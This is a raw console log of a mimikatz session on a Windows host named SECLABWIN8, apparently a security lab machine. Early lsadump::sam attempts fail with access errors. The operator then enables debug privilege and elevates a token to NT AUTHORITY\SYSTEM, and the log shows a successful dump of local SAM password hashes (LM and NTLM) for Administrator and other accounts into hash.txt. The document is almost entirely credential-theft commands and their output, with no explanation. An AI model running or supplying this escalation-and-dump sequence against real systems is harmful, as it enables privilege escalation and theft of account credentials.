- Using 'hash.txt' for logfile : OK
- mimikatz # lsadump::sam
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
- ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
- mimikatz # lsadump::sam
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
- ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
- mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
- ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
- mimikatz # token::elevate
- Token Id : 0
- User name :
- SID name : NT AUTHORITY\SYSTEM
- 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
- -> Impersonated !
- * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
- * Thread Token : {0;000003e7} 0 D 34417986 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
- mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- Local SID : S-1-5-21-3030430307-1650540796-4004713979
- SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
- RID : 000001f4 (500)
- User : Administrator
- Hash LM : a14dc20682ebc0a35db15e7df7536625
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- lm - 0: a14dc20682ebc0a35db15e7df7536625
- ntlm- 0: 4fd9671fef737b514356e75063f7dcac
- ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
- RID : 000001f5 (501)
- User : Guest
- RID : 000003e9 (1001)
- User : win8
- Hash NTLM: 00277317be7631466e6480877eedba5c
- RID : 000003ea (1002)
- User : poweruser
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- RID : 000003eb (1003)
- User : snmp
- Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
- mimikatz # reg save HKLM\SAM SamBkup.hiv
- ERROR mimikatz_doLocal ; "reg" command of "standard" module not found !
- Module : standard
- Full name : Standard module
- Description : Basic commands (does not require module name)
- exit - Quit mimikatz
- cls - Clear screen (doesn't work with redirections, like PsExec)
- answer - Answer to the Ultimate Question of Life, the Universe, and Everything
- coffee - Please, make me a coffee!
- sleep - Sleep an amount of milliseconds
- log - Log mimikatz input/output to file
- base64 - Switch file input/output base64
- version - Display some version informations
- cd - Change or display current directory
- localtime - Displays system local date and time (OJ command)
- hostname - Displays system local hostname
- mimikatz # privilege::debug
- Privilege '20' OK
- mimikatz # token::elevate
- Token Id : 0
- User name :
- SID name : NT AUTHORITY\SYSTEM
- 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
- -> Impersonated !
- * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
- * Thread Token : {0;000003e7} 0 D 34449475 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
- mimikatz # log hash.txt
- Using 'hash.txt' for logfile : OK
- mimikatz # lsadump::sam
- Domain : SECLABWIN8
- SysKey : 3938d539c83d8e6a3488325151ad0c05
- Local SID : S-1-5-21-3030430307-1650540796-4004713979
- SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
- RID : 000001f4 (500)
- User : Administrator
- Hash LM : a14dc20682ebc0a35db15e7df7536625
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- lm - 0: a14dc20682ebc0a35db15e7df7536625
- ntlm- 0: 4fd9671fef737b514356e75063f7dcac
- ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
- RID : 000001f5 (501)
- User : Guest
- RID : 000003e9 (1001)
- User : win8
- Hash NTLM: 00277317be7631466e6480877eedba5c
- RID : 000003ea (1002)
- User : poweruser
- Hash NTLM: 4fd9671fef737b514356e75063f7dcac
- RID : 000003eb (1003)
- User : snmp
- Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
- mimikatz #